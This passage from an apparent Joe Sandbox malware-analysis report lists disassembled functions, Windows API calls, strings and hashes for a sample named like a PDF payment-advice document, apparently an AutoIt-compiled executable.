                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 984253442-2268648507
                                                              • Opcode ID: 8923f8dd36b21444236cbeac5b1abd3512daa36b3645b2dd1c78b63bc15b7f7f
                                                              • Instruction ID: 51ac439e518a13a32e910b4703eae2e13ddfc3d7adf0cd4ec2d1bc26edd9ccc9
                                                              • Opcode Fuzzy Hash: 8923f8dd36b21444236cbeac5b1abd3512daa36b3645b2dd1c78b63bc15b7f7f
                                                              • Instruction Fuzzy Hash: 5D410D7290421DAACF05FBE8DD86EEE7B78FF14310F500065B605E6192EB356F49CA62
                                                              Function 008CBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,008C9207,?,?), ref: 008CBA56
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBA6D
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBA78
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBA85
                                                              • GlobalLock.KERNEL32(00000000), ref: 008CBA8E
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBA9D
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 008CBAA6
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBAAD
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,008C9207,?,?,00000000,?), ref: 008CBABE
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,008D2CAC,?), ref: 008CBAD7
                                                              • GlobalFree.KERNEL32(00000000), ref: 008CBAE7
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 008CBB0B
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 008CBB36
                                                              • DeleteObject.GDI32(00000000), ref: 008CBB5E
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008CBB74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: e9fd4a922ab8c05665bc9024659fe31a7f5c4c5a4f66a05bcb954298590a6576
                                                              • Instruction ID: a0c84cb0121e8578d0530e129f39a83e8e2a4d31fa077cd038c1ac3bd7a27d78
                                                              • Opcode Fuzzy Hash: e9fd4a922ab8c05665bc9024659fe31a7f5c4c5a4f66a05bcb954298590a6576
                                                              • Instruction Fuzzy Hash: D5412875601208EFEB119F65DC89EABBBB9FF89721F104069FA09D7261D7309D01CB60
                                                              Function 008AD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 008ADA10
                                                              • _wcscat.LIBCMT ref: 008ADA28
                                                              • _wcscat.LIBCMT ref: 008ADA3A
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008ADA4F
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADA63
                                                              • GetFileAttributesW.KERNEL32(?), ref: 008ADA7B
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 008ADA95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008ADAA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: 7232cd6ea227a02ecd38ef626bfde6f6dcde43ee9bf170ae36cb260a621090e5
                                                              • Instruction ID: da9d148d77d14606b71682a322cf1a1fcd9bda8894e53de0c19f77562d51e1ce
                                                              • Opcode Fuzzy Hash: 7232cd6ea227a02ecd38ef626bfde6f6dcde43ee9bf170ae36cb260a621090e5
                                                              • Instruction Fuzzy Hash: BF8182715043459FDB24DF68C844AAFBBE4FF8A314F18882EF88AC7A51D630D945CB52
                                                              Function 008CC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00842612: GetWindowLongW.USER32(?,000000EB), ref: 00842623
                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008CC1FC
                                                              • GetFocus.USER32 ref: 008CC20C
                                                              • GetDlgCtrlID.USER32(00000000), ref: 008CC217
                                                              • _memset.LIBCMT ref: 008CC342
                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 008CC36D
                                                              • GetMenuItemCount.USER32(?), ref: 008CC38D
                                                              • GetMenuItemID.USER32(?,00000000), ref: 008CC3A0
                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 008CC3D4
                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 008CC41C
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008CC454
                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 008CC489
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                              • String ID: 0
                                                              • API String ID: 1296962147-4108050209
                                                              • Opcode ID: c415f4bd55bebd7dba25e4633b7f358cd17aeb105c0316a7f223d9e9c8a2a24e
                                                              • Instruction ID: 8548881893dc9054d51d87c4ab0a8792397fafefb5ad481f12041e19ba82ade3
                                                              • Opcode Fuzzy Hash: c415f4bd55bebd7dba25e4633b7f358cd17aeb105c0316a7f223d9e9c8a2a24e
                                                              • Instruction Fuzzy Hash: AC8136702083419FE714CF28D894E6BBBF9FB88714F00892EFA99D6291D730D905CB92
                                                              Function 008B731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 008B738F
                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008B739B
                                                              • CreateCompatibleDC.GDI32(?), ref: 008B73A7
                                                              • SelectObject.GDI32(00000000,?), ref: 008B73B4
                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 008B7408
                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 008B7444
                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 008B7468
                                                              • SelectObject.GDI32(00000006,?), ref: 008B7470
                                                              • DeleteObject.GDI32(?), ref: 008B7479
                                                              • DeleteDC.GDI32(00000006), ref: 008B7480
                                                              • ReleaseDC.USER32(00000000,?), ref: 008B748B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                              • String ID: (
                                                              • API String ID: 2598888154-3887548279
                                                              • Opcode ID: 7e73d68b5ab02c8456a5e26267b70280a575fe7a31e0661247fbcea80e58fd11
                                                              • Instruction ID: 0ea0885312d41933ba0ccc1b9211a29bd0315b560478adbdcd6f9f310e183fd6
                                                              • Opcode Fuzzy Hash: 7e73d68b5ab02c8456a5e26267b70280a575fe7a31e0661247fbcea80e58fd11
                                                              • Instruction Fuzzy Hash: AE512775904309AFDB15CFA8CC85EAEBBB9FF88710F148529EA99D7311C731A9408B50
                                                              Function 00846A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00860957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00846B0C,?,00008000), ref: 00860973
                                                                • Part of subcall function 00844750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00844743,?,?,008437AE,?), ref: 00844770
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00846BAD
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00846CFA
                                                                • Part of subcall function 0084586D: _wcscpy.LIBCMT ref: 008458A5
                                                                • Part of subcall function 0086363D: _iswctype.LIBCMT ref: 00863645
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 537147316-1018226102
                                                              • Opcode ID: 62c4fa832b6be0c10f97870f0d18bee4e8de559e4b03ee2d6ef74780780bff4a
                                                              • Instruction ID: 3ad62c68aa535610be3ab29bb35ec57e2dc53c665c65136a4fc95caed8240d59
                                                              • Opcode Fuzzy Hash: 62c4fa832b6be0c10f97870f0d18bee4e8de559e4b03ee2d6ef74780780bff4a
                                                              • Instruction Fuzzy Hash: 9D0258305083489BC714EF28C881AAFBBE5FF99314F14491DF59AD62A2DB31D949CB53
                                                              Function 008A2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2D50
                                                              • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 008A2DDD
                                                              • GetMenuItemCount.USER32(00905890), ref: 008A2E66
                                                              • DeleteMenu.USER32(00905890,00000005,00000000,000000F5,?,?), ref: 008A2EF6
                                                              • DeleteMenu.USER32(00905890,00000004,00000000), ref: 008A2EFE
                                                              • DeleteMenu.USER32(00905890,00000006,00000000), ref: 008A2F06
                                                              • DeleteMenu.USER32(00905890,00000003,00000000), ref: 008A2F0E
                                                              • GetMenuItemCount.USER32(00905890), ref: 008A2F16
                                                              • SetMenuItemInfoW.USER32(00905890,00000004,00000000,00000030), ref: 008A2F4C
                                                              • GetCursorPos.USER32(?), ref: 008A2F56
                                                              • SetForegroundWindow.USER32(00000000), ref: 008A2F5F
                                                              • TrackPopupMenuEx.USER32(00905890,00000000,?,00000000,00000000,00000000), ref: 008A2F72
                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 008A2F7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                              • String ID:
                                                              • API String ID: 3993528054-0
                                                              • Opcode ID: 40ca235e212ae4ff73fe5eabed75be763cd2da28610ae26cc4bfd8963ea666a6
                                                              • Instruction ID: 0f1a021a854490338a914be88a3c4a33f359e365e249307c34c2c5ae5349be21
                                                              • Opcode Fuzzy Hash: 40ca235e212ae4ff73fe5eabed75be763cd2da28610ae26cc4bfd8963ea666a6
                                                              • Instruction Fuzzy Hash: 9171B070604209BEFB318F5CDC45FAABF65FB06364F100216F625E65E2CBB16860DB91
                                                              Function 008977DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                              • _memset.LIBCMT ref: 0089786B
                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008978A0
                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008978BC
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008978D8
                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00897902
                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0089792A
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00897935
                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0089793A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                              • API String ID: 1411258926-22481851
                                                              • Opcode ID: d809a87099825c1693778f9f843c6d07d727f78d042ea62840db293b716ca827
                                                              • Instruction ID: 4b6c9978d20bc9bb6767a18ccc662aa9cb214992a62b2abd092d71b42ee5b419
                                                              • Opcode Fuzzy Hash: d809a87099825c1693778f9f843c6d07d727f78d042ea62840db293b716ca827
                                                              • Instruction Fuzzy Hash: 9841F57282462DABDF11EBA8DC85DEDBB79FF14710B044069E915E3262EB345E04CB91
                                                              Function 008C0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,008BFDAD,?,?), ref: 008C0E31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                              • API String ID: 3964851224-909552448
                                                              • Opcode ID: 729d6cfbd4ebeb33bab1e038814593ddb1754357ab715a71339031cc1d7e790c
                                                              • Instruction ID: ba84291cbcf6e019fae2cfb70d09a44417f1c36268f8466233f1cc7b870d0a4f
                                                              • Opcode Fuzzy Hash: 729d6cfbd4ebeb33bab1e038814593ddb1754357ab715a71339031cc1d7e790c
                                                              • Instruction Fuzzy Hash: 6141343111025A8BCF10EEA8E851BEF3764FF21384F150458F9959B6A2DB30D99ADFA1
                                                              Function 0089F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0087E2A0,00000010,?,Bad directive syntax error,008CF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0089F7C2
                                                              • LoadStringW.USER32(00000000,?,0087E2A0,00000010), ref: 0089F7C9
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              • _wprintf.LIBCMT ref: 0089F7FC
                                                              • __swprintf.LIBCMT ref: 0089F81E
                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0089F88D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                              • API String ID: 1506413516-4153970271
                                                              • Opcode ID: 4a3c7dcc714cbd578ad8a8bad67333c1d2d7a66e85b77c859e267bb2ff53ebc0
                                                              • Instruction ID: 951427bc4c0bd5079645a0551f47b105125b0bede738d2e410772efeec0a5334
                                                              • Opcode Fuzzy Hash: 4a3c7dcc714cbd578ad8a8bad67333c1d2d7a66e85b77c859e267bb2ff53ebc0
                                                              • Instruction Fuzzy Hash: 25213E3290021EEBDF11AFA4CC4AEEE7739FF18300F044465F615E61A2EA75A658DB51
                                                              Function 008A52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847BCC: _memmove.LIBCMT ref: 00847C06
                                                                • Part of subcall function 00847924: _memmove.LIBCMT ref: 008479AD
                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008A5330
                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008A5346
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008A5357
                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008A5369
                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008A537A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: SendString$_memmove
                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                              • API String ID: 2279737902-1007645807
                                                              • Opcode ID: a5449dd0251e0980f44750608191bbf1f030e6d87eb3fd2bdf009245de5414bf
                                                              • Instruction ID: ca6764fbbe23c6b5f7b13a829e6b3da8114d50d51fde6b043628b9f5a9f5619d
                                                              • Opcode Fuzzy Hash: a5449dd0251e0980f44750608191bbf1f030e6d87eb3fd2bdf009245de5414bf
                                                              • Instruction Fuzzy Hash: 2F11632195015DB9DB20B675DC49EFFAABCFBE2B44F0004197511D21D1EEA41944C5A1
                                                              Function 008A46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                              • String ID: 0.0.0.0
                                                              • API String ID: 208665112-3771769585
                                                              • Opcode ID: d26124fdc308318afeed10dabafcd9419185766cd436b8773b841c47163e9a33
                                                              • Instruction ID: 20619a7c060b4ad430cd3c73c9a58f826c0ee87654d9051e66193210003896c0
                                                              • Opcode Fuzzy Hash: d26124fdc308318afeed10dabafcd9419185766cd436b8773b841c47163e9a33
                                                              • Instruction Fuzzy Hash: 7211D23150011CAFEF20AB349C4AEEA77BDFB42711F0441BAF545D61A2EFB58A818A51
                                                              Function 008A4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • timeGetTime.WINMM ref: 008A4F7A
                                                                • Part of subcall function 0086049F: timeGetTime.WINMM(?,75A4B400,00850E7B), ref: 008604A3
                                                              • Sleep.KERNEL32(0000000A), ref: 008A4FA6
                                                              • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 008A4FCA
                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008A4FEC
                                                              • SetActiveWindow.USER32 ref: 008A500B
                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008A5019
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 008A5038
                                                              • Sleep.KERNEL32(000000FA), ref: 008A5043
                                                              • IsWindow.USER32 ref: 008A504F
                                                              • EndDialog.USER32(00000000), ref: 008A5060
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                              • String ID: BUTTON
                                                              • API String ID: 1194449130-3405671355
                                                              • Opcode ID: c1c3716e9b32da39e4781ca04c2db057b75db23e6f228ee22a185aed2fae157d
                                                              • Instruction ID: 7236eb3a47191251084744c5381f84aaa0568ed55c06e3e58a8023ec7f265376
                                                              • Opcode Fuzzy Hash: c1c3716e9b32da39e4781ca04c2db057b75db23e6f228ee22a185aed2fae157d
